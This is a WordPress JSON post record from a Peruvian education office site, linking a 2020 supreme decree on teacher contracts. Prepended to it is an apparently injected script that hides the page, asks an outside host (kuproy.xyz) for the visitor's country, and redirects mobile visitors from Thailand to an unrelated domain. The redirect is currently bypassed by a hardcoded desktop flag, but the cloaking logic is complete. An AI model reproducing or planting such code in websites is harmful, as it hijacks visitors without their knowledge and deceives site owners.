<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":749,"date":"2020-12-02T08:25:00","date_gmt":"2020-12-02T13:25:00","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=749"},"modified":"2021-12-01T20:29:28","modified_gmt":"2021-12-02T01:29:28","slug":"decreto-supremo-n-015-2020-minedu","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/decreto-supremo-n-015-2020-minedu\/","title":{"rendered":"DECRETO SUPREMO N\u00b0 015 \u2013 2020 \u2013 MINEDU"},"content":{"rendered":"\n<p><strong>\u201cNORMA QUE REGULA EL PROCEDIMIENTO, REQUISITOS Y CONDICIONES PARA LAS CONTRATACIONES DE PROFESORES Y SU RENOVACI\u00d3N EN EL MARCO DEL CONTRATO DE SERVICIO DOCENTE EN EDUCACI\u00d3N B\u00c1SICA, A QUE HACE REFERENCIA LA LEY N\u00b0 30328, LEY QUE ESTABLECE MEDIDAS EN MATERIA EDUCATIVA Y DICTA OTRAS DISPOSICIONES\u201d<\/strong><\/p>\n\n\n\n<div data-wp-interactive=\"core\/file\" class=\"wp-block-file\"><object data-wp-bind--hidden=\"!state.hasPdfPreview\" hidden class=\"wp-block-file__embed\" data=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2021\/12\/DS-N\u00b0-015-2020-MINEDU-Normas-Legales.pdf.pdf\" type=\"application\/pdf\" style=\"width:100%;height:600px\" aria-label=\"Incrustado de Incrustado de DS-N\u00b0-015-2020-MINEDU-Normas-Legales.pdf..\"><\/object><a href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2021\/12\/DS-N\u00b0-015-2020-MINEDU-Normas-Legales.pdf.pdf\">DS-N\u00b0-015-2020-MINEDU-Normas-Legales.pdf<\/a><a href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2021\/12\/DS-N\u00b0-015-2020-MINEDU-Normas-Legales.pdf.pdf\" class=\"wp-block-file__button\" download>Descarga<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>\u201cNORMA QUE REGULA EL PROCEDIMIENTO, REQUISITOS Y CONDICIONES PARA LAS CONTRATACIONES DE PROFESORES Y SU RENOVACI\u00d3N EN EL MARCO DEL CONTRATO DE SERVICIO DOCENTE EN EDUCACI\u00d3N B\u00c1SICA, A QUE HACE REFERENCIA LA LEY N\u00b0 30328, LEY QUE ESTABLECE MEDIDAS EN MATERIA EDUCATIVA Y DICTA OTRAS DISPOSICIONES\u201d<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[17],"tags":[],"class_list":["post-749","post","type-post","status-publish","format-standard","hentry","category-contrato-docente"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/749","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=749"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/749\/revisions"}],"predecessor-version":[{"id":751,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/749\/revisions\/751"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=749"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=749"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=749"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}